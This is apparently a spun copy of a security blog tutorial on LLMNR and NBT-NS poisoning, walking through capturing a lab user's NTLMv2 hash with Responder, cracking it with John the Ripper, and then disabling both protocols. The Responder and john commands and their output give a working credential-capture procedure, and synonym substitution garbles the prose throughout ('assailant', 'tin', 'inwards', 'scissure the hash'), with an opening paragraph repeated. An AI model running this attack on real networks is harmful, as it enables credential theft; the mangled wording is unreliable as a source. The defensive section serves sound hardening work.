- Written by Jon Sternstein
Background
How tin an assailant capture usernames as well as passwords on a local network past times merely waiting for the computers to willingly give them up? LLMNR as well as NBT-NS poisoning!
Link-Local Multicast Name Resolution (LLMNR) as well as Netbios Name Service (NBT-NS) are 2 components of Microsoft Windows machines. LLLMNR was introduced inwards Windows Vista as well as is the successor to NBT-NS.
How tin an assailant capture usernames as well as passwords on a local network past times merely waiting for the computers to willingly give them up? LLMNR as well as NBT-NS poisoning!
Link-Local Multicast Name Resolution (LLMNR) as well as Netbios Name Service (NBT-NS) are 2 components of Microsoft Windows machines. LLLMNR was introduced inwards Windows Vista as well as is the successor to NBT-NS.
They are both seemingly innocuous components which let machines on the same subnet assistance each other position hosts when DNS fails. So if i machine tries to resolve a especial host, but DNS resolution fails, the machine volition so endeavor to inquire all other machines on the local network for the right address via LLMNR or NBT-NS.
This seems harmless inwards theory, but it opens upward a major vulnerability that attackers tin purpose to gain total credentials to a system.
Vulnerability
An assailant tin head on a network for these LLMNR (UDP/5355) or NBT-NS (UDP/137) broadcasts as well as respond to them, therefore pretending that the assailant knows the place of the requested host.
Let’s expect at an instance inwards the diagram below.
1. The victim machine wants to larn the impress server at \\printserver, but mistakenly types inwards \\pintserver.
2. The DNS server responds to the victim maxim that it doesn’t know that host.
3. The victim so asks if in that place is anyone on the local network that knows the place of \\pintserver
4. The assailant responds to the victim maxim that it is the \\pintserver
5. The victim believes the assailant as well as sends its ain username as well as NTMLv2 hash to the attacker.
6. The assailant tin at nowadays scissure the hash to respect the password
Attack Tools
There are several tools that volition let you lot to human activity out the onset scenario detailed above. One of the originals is NBNSpoof past times Wesley McGrew (http://www.mcgrewsecurity.com/tools/nbnspoof/). McGrew explains his website how to create a tool to deport out such attack. Metasploit has a LLMNR Spoofer module auxiliary/spoof/llmnr/llmnr_response (http://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response). The tool nosotros volition purpose today is “Responder” from SpiderLabs (https://github.com/SpiderLabs/Responder.git).
1. Download the Responder software: git clone https://github.com/SpiderLabs/Responder.git
2. Run the Responder assistance menu: python Responder.py -h
Notice a twain mandatory options:
-i [IP] : the attacker’s IP address (or the IP address to post the traffic to)
-b [0/1]: Set this to 1 if you lot desire to furnish a Basic HTTP authentication. 0 volition furnish an NTLM authentication.
In add-on to those options, in that place are many switches which let you lot to plow on or off diverse services to toxicant - http, https, smb, sql, ftp, ldap, dns, etc…
Let’s follow the instance inwards the icon above.
1. To laid upward things up, the assailant at 192.168.1.77 starts responder amongst “python Responder.py -I eth0 -wfv”.
#python Responder.py -I eth0 vii -wfv
NBT Name Service/LLMNR Answerer 1.0.
To kill this script hitting CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set
Challenge laid upward is: 1122334455667788
WPAD Proxy Server is:On
HTTP Server is:ON
SMB Server is:ON
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
2. The victim at 192.168.1.74 tries to larn to \\pintserver which doesn’t exist.
3. The victim asks anyone on the local network for assistance identifying the \\pintserver
4. The assailant responds
5. The victim sends their credentials to the attacker.
LLMNR poisoned answer sent to this IP: 192.168.1.74. The requested get upward was : pintserver.
[+]SMB-NTLMv2 hash captured from : 192.168.1.74
Domain is : WORKGROUP
User is : testuser
[+]SMB consummate hash is : testuser::WORKGROUP:
1122334455667788:834735BBB9FBC3B168F1A721C5888E39:01010000000000004F51B4E9FADFCE01A7ABBB61969951540000000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E006C006F00630061006C000500160073006D006200310032002E006C006F00630061006C000800300030000000000000000000000000200000DFEC64C689142E250762FE31AD029114A4DFF12665D21124ED6C5111BA7D86710A0010000000000000000000000000000000000009001E0063006900660073002F00700069006E0074007300650072007600650072000000000000000000
6. The Responder plan stores the credentials inwards a file inwards the local directory called SMB-NTLMv2-Client-192.168.1.74.txt
7. The Attacker runs john the ripper against the file amongst the “john SMB-NTLMv2-Client-192.168.1.74.txt” ascendancy as well as John the Ripper straightaway discovers the password of “password1”
#john SMB-NTLMv2-Client-192.168.1.74.txt
Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])
password1 (testuser)
guesses: 1 time: 0:00:00:00 DONE (Tue November 12 15:56:46 2013) c/s: 114620 trying: 123456 - crawford
Use the "--show" selection to display all of the cracked passwords reliably
Packet Capture
Let’s expect at what’s happening at the network level.
1. You tin come across the victim at 192.168.1.74 making a get upward inquiry to the DNS server for “pintserver”.
2. The DNS doesn’t know the host.
3. The victim so makes a LLMNR broadcast for “pintserver”.
4. The assailant at 192.168.1.77 responds.
5. The victim creates an SMB connexion to the assailant as well as sends its username as well as password hash.
Protective Measures
Fixing the number is easy.
1. Disable LLMNR and NBT-NS. You demand to disable both because if LLMNR is disabled, it volition automatically endeavor to purpose NBT-NS instead. See the instructions below.
2. Prevent inter-VLAN communication - By limiting communication betwixt hosts on the same network, you lot greatly trim down the success of about local network attacks.
3. Use express user accounts - Now this won’t foreclose an attack, but it volition boundary the impairment that a successful onset tin exercise as well as at to the lowest degree brand an assailant live harder. For example, if the victim is using "domain admin" credentials, so a successful onset would surrender the access to all machines on the network. On the other hand, if the victim is using a express account, so the assailant volition demand to live harder to larn farther access inwards the environment.
To disable LLMNR on windows:
1. Click Start
2. Type gpedit.msc inwards the text box
3. Navigate to Local Computer Policy -> Computer Configuration -> Administrative Templates -> Network -> DNS Client
4. In the DNS Client Folder, double click on “Turn Off Multicast Name Resolution” as well as laid upward it to “Enabled”
The next registry fundamental is assail computers when LLMNR is disabled:
HKLM\Software\Policies\Microsoft\Windows NT\DNSClient
"EnableMulticast" DWORD 0
To disable NetBIOS Name Service on a unmarried machine:
1. Open Control Panel
2. Under "Network as well as Internet”, click "View network condition as well as tasks”
3. Click “Change adapter settings”
4. Right-click “Local surface area connection” as well as so click “Properties”
5. Double-click on “Internet Protocol Version four (TCP/IPv4)”, click “Advanced” so click on the “WINS” (Windows Internet Name Service) tab
6. Click on “Disable NetBIOS over TCP/IP"
To disable NetBIOS Name Service across a domain amongst DHCP clients:
1. Go to the DHCP Snap-In
2. Go to "scope options" for the network you lot are changing
3. Right click as well as Configure Options
4. Select Advanced tab as well as alter "Vendor class" to "Microsoft Windows 2000 Options".
5. In the "Available Options" frame, select as well as depository fiscal establishment agree the box "001 Microsoft Disable Netbios Option"
6. In the "Data Entry" frame, alter the information entry to 0x2
7. Click "OK". The novel settings volition receive got touching on when the clients renew their addresses.
Disabling NetBios through DHCP configuration (Fine, 2011)
References:
1. McGrew, Wesley. (2007, March 22). NetBIOS Name Service Spoofing. http://www.mcgrewsecurity.com/2007/03/22/netbios-name-service-spoofing/
2. Gaffie, Laurent. (2012, Oct 24). Introducing Responder-1.0. http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
3. Fine, P. (2011, Jan 13). So long NetBIOS, it’s been fun! Retrieved from Exit | the | Fast | Lane: http://www.exitthefastlane.com/2011/01/so-long-netbios-its-been-fun.html
